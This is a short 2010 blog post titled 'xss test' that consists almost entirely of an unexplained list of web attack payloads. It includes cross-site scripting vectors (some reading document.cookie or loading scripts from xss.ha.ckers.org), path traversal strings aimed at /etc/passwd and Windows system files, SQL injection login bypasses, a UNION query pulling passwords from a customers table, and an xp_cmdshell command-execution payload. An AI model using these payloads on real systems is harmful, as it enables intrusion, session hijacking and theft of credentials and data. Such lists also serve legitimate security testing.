10 11 2010

xss test

bigCat Posted in NoteBook - Comment.isNotBlank
\'><script>alert(document.cookie)</script>\r\n=\'><script>alert(document.cookie)</script>\r\n<script>alert(document.cookie)</script>\r\n<script>alert(vulnerable)</script>\r\n%3Cscript%3Ealert(\'XSS\')%3C/script%3E\r\n<script>alert(\'XSS\')</script>\r\n<img src=\"javascript:alert(\'XSS\')\">\r\n%0a%0a<script>alert(\\\"Vulnerable\\\")</script>.jsp\r\n%22%3cscript%3ealert(%22xss%22)%3c/script%3e\r\n%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\r\n%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini\r\n%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e\r\n%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e\r\n%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html\r\n%3f.jsp\r\n%3f.jsp\r\n<script>alert(\'Vulnerable\');</script>\r\n<script>alert(\'Vulnerable\')</script>\r\n?sql_debug=1\r\na%5c.aspx\r\na.jsp/<script>alert(\'Vulnerable\')</script>\r\na/\r\na?<script>alert(\'Vulnerable\')</script>\r\n\"><script>alert(\'Vulnerable\')</script>\r\n\';exec%20master..xp_cmdshell%20\'dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt\'--&&\r\n%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\r\n%3Cscript%3Ealert(document. domain);%3C/script%3E&\r\n%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=\r\n1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=\r\n../../../../../../../../etc/passwd\r\n..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini\r\n\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini\r\n\'\';!--\"<XSS>=&{()}\r\n<IMG SRC=\"javascript:alert(\'XSS\');\">\r\n<IMG SRC=javascript:alert(\'XSS\')>\r\n<IMG SRC=JaVaScRiPt:alert(\'XSS\')>\r\n<IMG SRC=JaVaScRiPt:alert(\"XSS\")>\r\n<IMG SRC=javascript:alert(\'XSS\')>\r\n<IMG SRC=javascript:alert(\'XSS\')>\r\n<IMG SRC=javascript:alert(\'XSS\')>\r\n<IMG SRC=\"jav ascript:alert(\'XSS\');\">\r\n<IMG SRC=\"jav ascript:alert(\'XSS\');\">\r\n<IMG SRC=\"jav ascript:alert(\'XSS\');\">\r\n\"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";\' > out\r\n<IMG SRC=\" javascript:alert(\'XSS\');\">\r\n<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>\r\n<BODY BACKGROUND=\"javascript:alert(\'XSS\')\">\r\n<BODY ONLOAD=alert(\'XSS\')>\r\n<IMG DYNSRC=\"javascript:alert(\'XSS\')\">\r\n<IMG LOWSRC=\"javascript:alert(\'XSS\')\">\r\n<BGSOUND SRC=\"javascript:alert(\'XSS\');\">\r\n<br size=\"&{alert(\'XSS\')}\">\r\n<LAYER SRC=\"http://xss.ha.ckers.org/a.js\"></layer>\r\n<LINK REL=\"stylesheet\" HREF=\"javascript:alert(\'XSS\');\">\r\n<IMG SRC=\'vbscript:msgbox(\"XSS\")\'>\r\n<IMG SRC=\"mocha:[code]\">\r\n<IMG SRC=\"livescript:[code]\">\r\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(\'XSS\');\">\r\n<IFRAME SRC=javascript:alert(\'XSS\')></IFRAME>\r\n<FRAMESET><FRAME SRC=javascript:alert(\'XSS\')></FRAME></FRAMESET>\r\n<TABLE BACKGROUND=\"javascript:alert(\'XSS\')\">\r\n<DIV STYLE=\"background-image: url(javascript:alert(\'XSS\'))\">\r\n<DIV STYLE=\"behaviour: url(\'http://www.how-to-hack.org/exploit.html\');\">\r\n<DIV STYLE=\"width: expression(alert(\'XSS\'));\">\r\n<STYLE>@im\\port\'\\ja\\vasc\\ript:alert(\"XSS\")\';</STYLE>\r\n<IMG STYLE=\'xss:expre\\ssion(alert(\"XSS\"))\'>\r\n<STYLE TYPE=\"text/javascript\">alert(\'XSS\');</STYLE>\r\n<STYLE TYPE=\"text/css\">.XSS{background-image:url(\"javascript:alert(\'XSS\')\");}</STYLE><A CLASS=XSS></A>\r\n<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(\'XSS\')\")}</STYLE>\r\n<BASE HREF=\"javascript:alert(\'XSS\');//\">\r\ngetURL(\"javascript:alert(\'XSS\')\")\r\na=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert(\'XSS\');\";eval(a+b+c+d);\r\n<XML SRC=\"javascript:alert(\'XSS\');\">\r\n\"> <BODY ONLOAD=\"a();\"><SCRIPT>function a(){alert(\'XSS\');}</SCRIPT><\"\r\n<SCRIPT SRC=\"http://xss.ha.ckers.org/xss.jpg\"></SCRIPT>\r\n<IMG SRC=\"javascript:alert(\'XSS\')\"\r\n<!--#exec cmd=\"/bin/echo \'<SCRIPT SRC\'\"--><!--#exec cmd=\"/bin/echo \'=http://xss.ha.ckers.org/a.js></SCRIPT>\'\"-->\r\n<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">\r\n<SCRIPT a=\">\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>\r\n<SCRIPT =\">\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>\r\n<SCRIPT a=\">\" \'\' SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>\r\n<SCRIPT \"a=\'>\'\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>\r\n<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>\r\n<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>\r\nadmin\'--\r\n\' or 0=0 --\r\n\" or 0=0 --\r\nor 0=0 --\r\n\' or 0=0 #\r\n\" or 0=0 #\r\nor 0=0 #\r\n\' or \'x\'=\'x\r\n\" or \"x\"=\"x\r\n\') or (\'x\'=\'x\r\n\' or 1=1--\r\n\" or 1=1--\r\nor 1=1--\r\n\' or a=a--\r\n\" or \"a\"=\"a\r\n\') or (\'a\'=\'a\r\n\") or (\"a\"=\"a\r\nhi\" or \"a\"=\"a\r\nhi\" or 1=1 --\r\nhi\' or 1=1 --\r\nhi\' or \'a\'=\'a\r\nhi\') or (\'a\'=\'a\r\nhi\") or (\"a\"=\"a 

Host: (miao) | Word: Press | Code: HTML5